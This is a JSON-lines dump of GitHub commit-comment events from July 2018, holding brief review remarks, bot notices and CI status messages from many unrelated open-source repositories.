{"id":"7994260088","type":"CommitCommentEvent","actor":{"login":"Worsell"},"repo":{"name":"svnayden/htsjdk"},"payload":{"comment":{"id":29777159,"position":21,"line":21,"path":"src/main/java/htsjdk/utils/convertorToDatabase/Read.java","commit_id":"73939ca9ce328a21196896fa750fd0334671d63e","created_at":"2018-07-20T10:36:50Z","updated_at":"2018-07-20T10:36:50Z","author_association":"COLLABORATOR","body":"Она как раз об этом и говорит:) \r\nhttps://www.jetbrains.com/help/idea/nullable-and-notnull-annotations.html\r\nПринято указывать @Nullable во всех случаях, когда возможен указатель на null. Все остальные случаи по умолчанию @NotNull но я предпочитаю иногда явно это выделить.\r\n\r\n"}},"created_at":"2018-07-20T10:36:50Z"}
{"id":"7994260684","type":"CommitCommentEvent","actor":{"login":"christoff-buerger"},"repo":{"name":"christoff-buerger/Modelica_Synchronous"},"payload":{"comment":{"id":29777163,"position":null,"line":null,"path":null,"commit_id":"228265bbbfd8796567e90f35d56ce1434d7e323e","created_at":"2018-07-20T10:36:58Z","updated_at":"2018-07-20T10:36:58Z","author_association":"OWNER","body":"Typo: Fixes issue #33, not #32."}},"created_at":"2018-07-20T10:36:58Z"}
{"id":"7994263846","type":"CommitCommentEvent","actor":{"login":"1055224174"},"repo":{"name":"1055224174/Hello-world"},"payload":{"comment":{"id":29777167,"position":5,"line":9,"path":"README.md","commit_id":"15eabc83bc67f096dcd7e4e4626b74983512fe62","created_at":"2018-07-20T10:37:41Z","updated_at":"2018-07-20T10:37:41Z","author_association":"OWNER","body":"q"}},"created_at":"2018-07-20T10:37:41Z"}
{"id":"7994264783","type":"CommitCommentEvent","actor":{"login":"Worsell"},"repo":{"name":"svnayden/htsjdk"},"payload":{"comment":{"id":29777169,"position":19,"line":19,"path":"src/main/java/htsjdk/utils/convertorToDatabase/Sequence.java","commit_id":"73939ca9ce328a21196896fa750fd0334671d63e","created_at":"2018-07-20T10:37:55Z","updated_at":"2018-07-20T10:37:55Z","author_association":"COLLABORATOR","body":"А что не работает?"}},"created_at":"2018-07-20T10:37:55Z"}
{"id":"7994267025","type":"CommitCommentEvent","actor":{"login":"Olezha"},"repo":{"name":"Olezha/Quadro"},"payload":{"comment":{"id":29777171,"position":33,"line":165,"path":"quadro/src/main/java/com/codenjoy/dojo/quadro/model/Quadro.java","commit_id":"238f90b4a447d4880d51f53a5bfd48d2aac2be87","created_at":"2018-07-20T10:38:26Z","updated_at":"2018-07-20T10:38:26Z","author_association":"OWNER","body":"На самом деле нужно было только это."}},"created_at":"2018-07-20T10:38:26Z"}
{"id":"7994267286","type":"CommitCommentEvent","actor":{"login":"Worsell"},"repo":{"name":"svnayden/htsjdk"},"payload":{"comment":{"id":29777172,"position":16,"line":16,"path":"src/test/java/htsjdk/utils/convertorToDatabase/ReadTest.java","commit_id":"73939ca9ce328a21196896fa750fd0334671d63e","created_at":"2018-07-20T10:38:29Z","updated_at":"2018-07-20T10:38:29Z","author_association":"COLLABORATOR","body":"не очень понял опять, что не так"}},"created_at":"2018-07-20T10:38:29Z"}
{"id":"7994280371","type":"CommitCommentEvent","actor":{"login":"zarechenskiy"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29777193,"position":5,"line":1459,"path":"compiler/backend/src/org/jetbrains/kotlin/codegen/StackValue.java","commit_id":"5c9a71b883879e71772aaba7dc28f6462ef80d65","created_at":"2018-07-20T10:41:33Z","updated_at":"2018-07-20T10:41:33Z","author_association":"MEMBER","body":"This is relevant for `const vals` of inline class types"}},"created_at":"2018-07-20T10:41:33Z"}
{"id":"7994285467","type":"CommitCommentEvent","actor":{"login":"gmltA"},"repo":{"name":"MikhailSkirukha/bsuirfind"},"payload":{"comment":{"id":29777204,"position":22,"line":57,"path":"BsuirFind.Foundation/Services/JobsService.cs","commit_id":"9cbc9bf14d6cf4980dd4e51b8ab11ccb6ad0aad3","created_at":"2018-07-20T10:42:47Z","updated_at":"2018-07-20T10:42:47Z","author_association":"COLLABORATOR","body":"This value is not being written to DB.\r\nGame is not starting."}},"created_at":"2018-07-20T10:42:47Z"}
{"id":"7994289579","type":"CommitCommentEvent","actor":{"login":"tacotexmex"},"repo":{"name":"thomasrudin-mt/missions"},"payload":{"comment":{"id":29777214,"position":null,"line":null,"path":null,"commit_id":"35516a35b6b6b1f6cfe9a5fbd8e386d13562fe19","created_at":"2018-07-20T10:43:44Z","updated_at":"2018-07-20T10:43:44Z","author_association":"NONE","body":"Nice!"}},"created_at":"2018-07-20T10:43:44Z"}
{"id":"7994295842","type":"CommitCommentEvent","actor":{"login":"magnusvojbacke"},"repo":{"name":"evis/scala-style-guide-enforce"},"payload":{"comment":{"id":29777228,"position":50,"line":85,"path":"scalastyle_config.xml","commit_id":"2742e17a2474887b33446ebde23a23ea613958fc","created_at":"2018-07-20T10:45:12Z","updated_at":"2018-07-20T10:45:12Z","author_association":"NONE","body":"I hope so, because I would really like to deploy style checking in CI to ensure adherence to the scala-lang.org style guide :)\n\nMaybe this particular check requires some sort of specialized brace checker?\n\n> On 20 Jul 2018, at 12:36, Evgeny Veretennikov <notifications@github.com> wrote:\n> \n> thanks, looks reasonable :(\n> \n> this project isn't ready to use yet... but maybe I will find time to make it usable :)\n> \n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub <https://github.com/evis/scala-style-guide-enforce/commit/2742e17a2474887b33446ebde23a23ea613958fc#commitcomment-29777155>, or mute the thread <https://github.com/notifications/unsubscribe-auth/ABqSFFrLUYjtqCItB-hjMxm5hUmcqrDGks5uIbKlgaJpZM4VXzmS>.\n> \n\n"}},"created_at":"2018-07-20T10:45:12Z"}
{"id":"7994301288","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29777238,"position":5,"line":1459,"path":"compiler/backend/src/org/jetbrains/kotlin/codegen/StackValue.java","commit_id":"5c9a71b883879e71772aaba7dc28f6462ef80d65","created_at":"2018-07-20T10:46:27Z","updated_at":"2018-07-20T10:46:27Z","author_association":"MEMBER","body":"But it probably changes the behavior of other const val usages, doesn't it?"}},"created_at":"2018-07-20T10:46:27Z"}
{"id":"7994303837","type":"CommitCommentEvent","actor":{"login":"15982224307"},"repo":{"name":"xiaoException/tuancan"},"payload":{"comment":{"id":29777243,"position":15,"line":45,"path":"src/main/java/com/example/tuancan/dao/AnswerMapper.java","commit_id":"03829b974bf4c9f74d49c7802a0e16444e78cd28","created_at":"2018-07-20T10:47:03Z","updated_at":"2018-07-20T10:47:03Z","author_association":"COLLABORATOR","body":"2"}},"created_at":"2018-07-20T10:47:03Z"}
{"id":"7994311509","type":"CommitCommentEvent","actor":{"login":"zarechenskiy"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29777261,"position":5,"line":1459,"path":"compiler/backend/src/org/jetbrains/kotlin/codegen/StackValue.java","commit_id":"5c9a71b883879e71772aaba7dc28f6462ef80d65","created_at":"2018-07-20T10:48:50Z","updated_at":"2018-07-20T10:48:50Z","author_association":"MEMBER","body":"Agreed, I'll add a test on `const val` + boxing"}},"created_at":"2018-07-20T10:48:50Z"}
{"id":"7994312871","type":"CommitCommentEvent","actor":{"login":"kolyshkin"},"repo":{"name":"go-swagger/go-swagger"},"payload":{"comment":{"id":29777263,"position":null,"line":null,"path":null,"commit_id":"d2aae8150c526d861828ee0e8a16623df01d3fb5","created_at":"2018-07-20T10:49:10Z","updated_at":"2018-07-20T10:49:10Z","author_association":"NONE","body":"This commit unexpectedly and silently removes --skip-validator option. @diego-fu-hs @casualjim could you please explain why?"}},"created_at":"2018-07-20T10:49:10Z"}
{"id":"7994316378","type":"CommitCommentEvent","actor":{"login":"mariopoeta"},"repo":{"name":"GoogleCloudPlatform/deploymentmanager-samples"},"payload":{"comment":{"id":29777267,"position":null,"line":null,"path":null,"commit_id":"e0c6be6d8f0d7b8ba299dbcd1afa7cd57b132ff8","created_at":"2018-07-20T10:49:59Z","updated_at":"2018-07-20T10:49:59Z","author_association":"CONTRIBUTOR","body":"Cool, still waiting for my 2nd PR to be accepted ;)"}},"created_at":"2018-07-20T10:49:59Z"}
{"id":"7994317935","type":"CommitCommentEvent","actor":{"login":"fckt"},"repo":{"name":"paritytech/pwasm-abi"},"payload":{"comment":{"id":29777272,"position":118,"line":110,"path":"src/eth/tests.rs","commit_id":"9e43b3d3a763724ad2775bcdc934c250d10ea45e","created_at":"2018-07-20T10:50:22Z","updated_at":"2018-07-20T10:50:22Z","author_association":"MEMBER","body":"could you explain this change for me?"}},"created_at":"2018-07-20T10:50:22Z"}
{"id":"7994324514","type":"CommitCommentEvent","actor":{"login":"PREMjITHT"},"repo":{"name":"embeddedarm/linux-3.10.17-imx6"},"payload":{"comment":{"id":29777291,"position":null,"line":null,"path":null,"commit_id":"4490c20658c9a591151d089b47c1c1a8c2c7d429","created_at":"2018-07-20T10:52:00Z","updated_at":"2018-07-20T10:52:00Z","author_association":"NONE","body":"Sir,\r\nYou should change that name in also linux_wlan_sdio.c file ..."}},"created_at":"2018-07-20T10:52:00Z"}
{"id":"7994324618","type":"CommitCommentEvent","actor":{"login":"fredbi"},"repo":{"name":"go-swagger/go-swagger"},"payload":{"comment":{"id":29777292,"position":null,"line":null,"path":null,"commit_id":"d2aae8150c526d861828ee0e8a16623df01d3fb5","created_at":"2018-07-20T10:52:01Z","updated_at":"2018-07-20T10:52:01Z","author_association":"CONTRIBUTOR","body":"Hello. I recall that during the review of this PR, since there was some refactoring of CLI options handling, @casualjim asked to remove the support for this option.\r\n\r\nThe was too much confusion between `--skip-validation` and `--skip-validator` I guess..."}},"created_at":"2018-07-20T10:52:01Z"}
{"id":"7994333372","type":"CommitCommentEvent","actor":{"login":"ASBishop"},"repo":{"name":"PranaliDeore/puppet-tripleo"},"payload":{"comment":{"id":29777315,"position":27,"line":50,"path":"manifests/profile/base/glance/netapp.pp","commit_id":"eea4d18b7655badb41ec2496996bb1326a902f8a","created_at":"2018-07-20T10:54:08Z","updated_at":"2018-07-20T10:54:08Z","author_association":"NONE","body":"I don't know what the 'id' represents, but the \"FlexPod1\" value (from Dave Cain's blog) is not something that should be used here because I think it's something unique to Dave's environment.\r\n\r\nNetapp's doc doesn't include an 'id' in their example, so I think we can drop it. In other words, I recommend deleting L50."}},"created_at":"2018-07-20T10:54:08Z"}
{"id":"7994336412","type":"CommitCommentEvent","actor":{"login":"craneworks"},"repo":{"name":"micheloosterhof/cowrie"},"payload":{"comment":{"id":29777323,"position":null,"line":null,"path":null,"commit_id":"39a2b3ee8de7f357ed2b5f5a7d0115b39c854caa","created_at":"2018-07-20T10:54:51Z","updated_at":"2018-07-20T10:54:51Z","author_association":"CONTRIBUTOR","body":"Ah, look at my PR. I did something similiar"}},"created_at":"2018-07-20T10:54:51Z"}
{"id":"7994340216","type":"CommitCommentEvent","actor":{"login":"jganiyu"},"repo":{"name":"jganiyu/hello-world"},"payload":{"comment":{"id":29777329,"position":null,"line":null,"path":null,"commit_id":"fdfc548a8bc8df19ef540aefd27c6fa48a71aa6a","created_at":"2018-07-20T10:55:45Z","updated_at":"2018-07-20T10:55:45Z","author_association":"OWNER","body":"Nice commit. I love weed too."}},"created_at":"2018-07-20T10:55:45Z"}
{"id":"7994344245","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29777342,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-20T10:56:43Z","updated_at":"2018-07-20T10:56:43Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-20T10:56:43Z"}
{"id":"7994345433","type":"CommitCommentEvent","actor":{"login":"Pzixel"},"repo":{"name":"paritytech/pwasm-abi"},"payload":{"comment":{"id":29777345,"position":118,"line":110,"path":"src/eth/tests.rs","commit_id":"9e43b3d3a763724ad2775bcdc934c250d10ea45e","created_at":"2018-07-20T10:57:00Z","updated_at":"2018-07-20T10:57:00Z","author_association":"NONE","body":"U128[ doesn't support `Display` and `Debug` for no_std](https://github.com/paritytech/bigint/blob/master/src/uint.rs#L913-L918). I just made test pass on `no_std` (because it's probably better than fail with crippy errors). "}},"created_at":"2018-07-20T10:57:00Z"}
{"id":"7994346081","type":"CommitCommentEvent","actor":{"login":"techthreads"},"repo":{"name":"ThreadsStyling/tslint"},"payload":{"comment":{"id":29777347,"position":null,"line":null,"path":null,"commit_id":"c79347375155ca0147290df997bae84fc5b217cb","created_at":"2018-07-20T10:57:10Z","updated_at":"2018-07-20T10:57:10Z","author_association":"NONE","body":"Build version: __`3.3.0-master.19`__ :crossed_fingers: [`master`](https://github.com/ThreadsStyling/tslint/tree/master) on [*CircleCI*](https://circleci.com/gh/ThreadsStyling/tslint/19) :tada:"}},"created_at":"2018-07-20T10:57:10Z"}
{"id":"7994347413","type":"CommitCommentEvent","actor":{"login":"frenzymadness"},"repo":{"name":"pyvec/pyvo-data"},"payload":{"comment":{"id":29777353,"position":1,"line":1,"path":"cities/liskovec/city.yaml","commit_id":"cadb898c6a656ca0aad3a6c5895ee89ca53efd85","created_at":"2018-07-20T10:57:28Z","updated_at":"2018-07-20T10:57:28Z","author_association":"CONTRIBUTOR","body":"PR welcome"}},"created_at":"2018-07-20T10:57:28Z"}
{"id":"7994350241","type":"CommitCommentEvent","actor":{"login":"NinjaRose"},"repo":{"name":"NinjaRose/test1"},"payload":{"comment":{"id":29777361,"position":6,"line":6,"path":"index.html","commit_id":"bf0c50e7b43e73142884794236d6787f329a655c","created_at":"2018-07-20T10:58:09Z","updated_at":"2018-07-20T10:58:09Z","author_association":"OWNER","body":"this is head\r\n"}},"created_at":"2018-07-20T10:58:09Z"}
{"id":"7994352233","type":"CommitCommentEvent","actor":{"login":"NinjaRose"},"repo":{"name":"NinjaRose/test1"},"payload":{"comment":{"id":29777371,"position":null,"line":null,"path":null,"commit_id":"bf0c50e7b43e73142884794236d6787f329a655c","created_at":"2018-07-20T10:58:35Z","updated_at":"2018-07-20T10:58:35Z","author_association":"OWNER","body":"good job!"}},"created_at":"2018-07-20T10:58:35Z"}
{"id":"7994352464","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29777374,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-20T10:58:38Z","updated_at":"2018-07-20T10:58:38Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-20T10:58:38Z"}
{"id":"7994365443","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/r-vdiffr-feedstock"},"payload":{"comment":{"id":29777402,"position":null,"line":null,"path":null,"commit_id":"7ccf0b4f037d71c2f6bff2d6dbf1c71bb5c28fb1","created_at":"2018-07-20T11:01:33Z","updated_at":"2018-07-20T11:01:33Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @jenzopr was added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-20T11:01:33Z"}
{"id":"7994367632","type":"CommitCommentEvent","actor":{"login":"aliariff"},"repo":{"name":"aliariff/vscode-auto-add-brackets"},"payload":{"comment":{"id":29777408,"position":88,"line":88,"path":"src/extension.ts","commit_id":"82973bd00d948711af4e3573ab2fefc91f9bead0","created_at":"2018-07-20T11:02:03Z","updated_at":"2018-07-20T11:02:03Z","author_association":"OWNER","body":"Yes you are right, fixed in https://github.com/aliariff/vscode-auto-add-brackets/commit/d594d41f3f15bdde0f3fe4ae09032732e801de73\r\n\r\nThanks"}},"created_at":"2018-07-20T11:02:03Z"}
{"id":"7994368208","type":"CommitCommentEvent","actor":{"login":"ASBishop"},"repo":{"name":"PranaliDeore/puppet-glance"},"payload":{"comment":{"id":29777409,"position":4,"line":138,"path":"manifests/api.pp","commit_id":"f77342021d44550de099161d17854ec25bc36e11","created_at":"2018-07-20T11:02:11Z","updated_at":"2018-07-20T11:02:11Z","author_association":"NONE","body":"The code changes look great, but I don't think you saw the comment I left regarding the commit message. As I mentioned elsewhere, the github UI doesn't make it easy to leave comments on commit messages. You can see my earlier comment at the bottom of this page, on the left."}},"created_at":"2018-07-20T11:02:11Z"}
{"id":"7994370200","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/r-highlight-feedstock"},"payload":{"comment":{"id":29777411,"position":null,"line":null,"path":null,"commit_id":"3aa2fe879d1042ecc2727e0c1439a2ce5e96df56","created_at":"2018-07-20T11:02:36Z","updated_at":"2018-07-20T11:02:36Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @dbast was added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-20T11:02:36Z"}
{"id":"7994370529","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/r-pkgdown-feedstock"},"payload":{"comment":{"id":29777412,"position":null,"line":null,"path":null,"commit_id":"fa7205d6d6bf6cba17c98175a7337bb20b9f81bf","created_at":"2018-07-20T11:02:41Z","updated_at":"2018-07-20T11:02:41Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @dbast was added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-20T11:02:41Z"}
{"id":"7994484938","type":"CommitCommentEvent","actor":{"login":"cmditch"},"repo":{"name":"cmditch/elm-ethereum"},"payload":{"comment":{"id":29777724,"position":null,"line":null,"path":null,"commit_id":"d3c993355d94f7d92a182744e659a85597f50aff","created_at":"2018-07-20T11:31:01Z","updated_at":"2018-07-20T11:31:01Z","author_association":"OWNER","body":"Unfortunately the integer encoding is a bit more complex than this, as Ethereum uses a \"twos complement\" 32 byte signed integer.\r\n\r\nThe above will create a hex like \"-0x123\", which is invalid input for the EVM. Apologize the implementation of some of the more complex ABI types (Like the above, and dynamic types) has taken so long. My bandwidth is quite limited lately, and I've only been working on contracts which tend to use `uint256` or ` address` as input."}},"created_at":"2018-07-20T11:31:01Z"}
{"id":"7994486079","type":"CommitCommentEvent","actor":{"login":"Marginal"},"repo":{"name":"Marginal/docker-get_iplayer"},"payload":{"comment":{"id":29777727,"position":7,"line":7,"path":"Dockerfile","commit_id":"5a73d171034849c65c48565e636973bea633c5a9","created_at":"2018-07-20T11:31:17Z","updated_at":"2018-07-20T11:31:17Z","author_association":"OWNER","body":"Thanks. Will remove."}},"created_at":"2018-07-20T11:31:17Z"}
{"id":"7994486412","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"DronMDF/zold-lazy-node"},"payload":{"comment":{"id":29777729,"position":null,"line":null,"path":null,"commit_id":"061d04c8f3dd6a8c4e9bb72470be4973b72b8290","created_at":"2018-07-20T11:31:22Z","updated_at":"2018-07-20T11:31:22Z","author_association":"COLLABORATOR","body":"Puzzle `54-ce6dfa94` disappeared from [`zln/zln.py`](https://github.com/DronMDF/zold-lazy-node/blob/master/zln/zln.py), that's why I closed #65. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-20T11:31:22Z"}
{"id":"7994486573","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"DronMDF/zold-lazy-node"},"payload":{"comment":{"id":29777731,"position":null,"line":null,"path":null,"commit_id":"061d04c8f3dd6a8c4e9bb72470be4973b72b8290","created_at":"2018-07-20T11:31:24Z","updated_at":"2018-07-20T11:31:24Z","author_association":"COLLABORATOR","body":"Puzzle `65-defb6c5f` discovered in   [`zold/score.py`](  https://github.com/DronMDF/zold-lazy-node/blob/master/zold/score.py)   and submitted as #84. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-20T11:31:24Z"}
{"id":"7994497730","type":"CommitCommentEvent","actor":{"login":"wongyinan"},"repo":{"name":"ISosnovik/top"},"payload":{"comment":{"id":29777757,"position":null,"line":null,"path":null,"commit_id":"c6fb212bfe9f622fadeaddfcffe8a78280dbb8bd","created_at":"2018-07-20T11:34:01Z","updated_at":"2018-07-20T11:34:01Z","author_association":"NONE","body":"The download link of [**Download (3.08 Gb)**][top4040] is not available, you got another backup site? \r\np.s, I'm in China, using shadowsocks to reach this website. "}},"created_at":"2018-07-20T11:34:01Z"}
{"id":"7994498117","type":"CommitCommentEvent","actor":{"login":"gazoo74"},"repo":{"name":"savoirfairelinux/cukinia"},"payload":{"comment":{"id":29777759,"position":5,"line":379,"path":"cukinia","commit_id":"4b4dc9cb23d338806039fbff76aea81bcedfc2ce","created_at":"2018-07-20T11:34:07Z","updated_at":"2018-07-20T11:34:07Z","author_association":"CONTRIBUTOR","body":"Could you move the cut when your are affecting the parameter to the variable. I think it will be more readable.\r\n\r\nAlso, I made a mistake in my comment, it is `Closes #38.`."}},"created_at":"2018-07-20T11:34:07Z"}
{"id":"7994513501","type":"CommitCommentEvent","actor":{"login":"gorhill"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29777811,"position":null,"line":null,"path":null,"commit_id":"23206100198dfdd3c789773e953a232e442bdc48","created_at":"2018-07-20T11:37:49Z","updated_at":"2018-07-20T11:37:49Z","author_association":"MEMBER","body":"@dimisa-RUAdList Using TLD for injecting scriptlets, even though it works as per current implementation, goes against the spirit of why I do not allow blanket injection of scriptlets: efficiency concerns, and site-breaking concerns.\r\n\r\nAt least it would be best to remove from your lists TLDs which are not reasonably RUS- or UKR-specific, such as `com`, `org`, etc."}},"created_at":"2018-07-20T11:37:49Z"}
{"id":"7994517847","type":"CommitCommentEvent","actor":{"login":"Cranite"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29777815,"position":63,"line":63,"path":"src/main/java/com/github/cranite/MoreEnchantables/Configuration.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-20T11:38:52Z","updated_at":"2018-07-20T11:38:52Z","author_association":"NONE","body":"I think what I'm going to do here is mimic what ItemExchange currently does when parsing rule buttons, and that's to encapsulate everything within a try/catch instead of just a few parts, https://github.com/Cranite/ItemExchange/blob/master/src/main/java/com/untamedears/ItemExchange/utility/ExchangeRule.java#L130\r\n\r\nAlthough in that case it's simply throwing a new error, I do intend to print the full stack trace, but simply catching the error to add my own message onto the error, telling the admins it's a config parse error, instead of having to decipher it from the stack trace.\r\n\r\n```java\r\ncatch (Exception error) {\r\n    MoreEnchantablesPlugin.consoleLog(\"Was unable to parse the given config file:-\");\r\n    error.printStackTrace();\r\n}\r\n```\r\n\r\nWould that be suitable?"}},"created_at":"2018-07-20T11:38:52Z"}
{"id":"7994519550","type":"CommitCommentEvent","actor":{"login":"Marginal"},"repo":{"name":"Marginal/docker-get_iplayer"},"payload":{"comment":{"id":29777820,"position":6,"line":6,"path":"pvr","commit_id":"5a73d171034849c65c48565e636973bea633c5a9","created_at":"2018-07-20T11:39:17Z","updated_at":"2018-07-20T11:39:17Z","author_association":"OWNER","body":"Thanks for your comments.\r\n\r\nI'll just remove --refresh. People can set `expiry` in options if they want more frequent refresh.\r\n\r\nBack in rtmpdump days I would sometimes find that the process hung indefinitely, so I started using a timeout. Never got to the bottom of why it was hanging, and I haven't seen it happen in a while. I'll retain the timeout as a belt-and-braces approach, but increase it to 4 hours which should be enough for anybody."}},"created_at":"2018-07-20T11:39:17Z"}
{"id":"7994519939","type":"CommitCommentEvent","actor":{"login":"Kaperskyguru"},"repo":{"name":"zico404/student-s-lodge-finder"},"payload":{"comment":{"id":29777825,"position":null,"line":null,"path":null,"commit_id":"cf5cff586f3f6146e387a8e74c2eb0e72380484f","created_at":"2018-07-20T11:39:23Z","updated_at":"2018-07-20T11:39:23Z","author_association":"COLLABORATOR","body":"ok.... fetching now"}},"created_at":"2018-07-20T11:39:23Z"}
{"id":"7994522275","type":"CommitCommentEvent","actor":{"login":"hldh214"},"repo":{"name":"ClintOxx/PUBG-Battlepoint-FarmBot"},"payload":{"comment":{"id":29777833,"position":4,"line":7,"path":"README.md","commit_id":"696530a538d5da2b565fbb0dc4049185ca90cc27","created_at":"2018-07-20T11:39:57Z","updated_at":"2018-07-20T11:39:57Z","author_association":"NONE","body":"<3"}},"created_at":"2018-07-20T11:39:57Z"}
{"id":"7994525258","type":"CommitCommentEvent","actor":{"login":"eprocurementontology"},"repo":{"name":"eprocurementontology/eprocurementontology"},"payload":{"comment":{"id":29777840,"position":null,"line":null,"path":null,"commit_id":"1d9a4536ba06e34f9baa05de9fa63d8b99d7c9ea","created_at":"2018-07-20T11:40:41Z","updated_at":"2018-07-20T11:40:41Z","author_association":"OWNER","body":"[eProcurement_glossary_v148.xlsx](https://github.com/eprocurementontology/eprocurementontology/files/2213703/eProcurement_glossary_v148.xlsx)\r\n"}},"created_at":"2018-07-20T11:40:41Z"}
{"id":"7994525880","type":"CommitCommentEvent","actor":{"login":"balta2ar"},"repo":{"name":"ncm2/ncm2-tmux"},"payload":{"comment":{"id":29777844,"position":10,"line":10,"path":"autoload/ncm2_tmux.vim","commit_id":"c4e1f2507e2d164d9abee11baca9abb901f835f4","created_at":"2018-07-20T11:40:50Z","updated_at":"2018-07-20T11:40:50Z","author_association":"NONE","body":"@roxma This line looks suspicious... One can has multiple tmux windows, but then run vim instance in a new console not within a tmux.. Completion will not be automatically suggested in this case, right? What's the reasoning?"}},"created_at":"2018-07-20T11:40:50Z"}
{"id":"7994526663","type":"CommitCommentEvent","actor":{"login":"Nekiono"},"repo":{"name":"Nekiono/marv-docs"},"payload":{"comment":{"id":29777847,"position":null,"line":null,"path":null,"commit_id":"7336cd8a0dfdcb0b2929a1e765fea6b81ddf086d","created_at":"2018-07-20T11:41:03Z","updated_at":"2018-07-20T11:41:03Z","author_association":"OWNER","body":"Since I wanna test it on nekiono.github.io"}},"created_at":"2018-07-20T11:41:03Z"}
{"id":"7994527855","type":"CommitCommentEvent","actor":{"login":"ASBishop"},"repo":{"name":"PranaliDeore/tripleo-heat-templates"},"payload":{"comment":{"id":29777854,"position":25,"line":354,"path":"puppet/services/glance-api.yaml","commit_id":"f7cc4b6e463570da034e2a1a7922b4d810232bd9","created_at":"2018-07-20T11:41:21Z","updated_at":"2018-07-20T11:41:21Z","author_association":"NONE","body":"Just curious if this syntax is required, or if L354 and L355 could be combined by removing the '|'.  YAML's '|' means \"collect the next several lines into a single string,\" but you only have one line to collect (L355).\r\n\r\nSame thing with L358 and L359. "}},"created_at":"2018-07-20T11:41:21Z"}
{"id":"7994527882","type":"CommitCommentEvent","actor":{"login":"munaf1234567"},"repo":{"name":"munaf1234567/munnafrepo"},"payload":{"comment":{"id":29777855,"position":null,"line":null,"path":null,"commit_id":"7c23ab640677b3acc4845313158e1f78bb99bced","created_at":"2018-07-20T11:41:21Z","updated_at":"2018-07-20T11:41:21Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-20T11:41:21Z"}
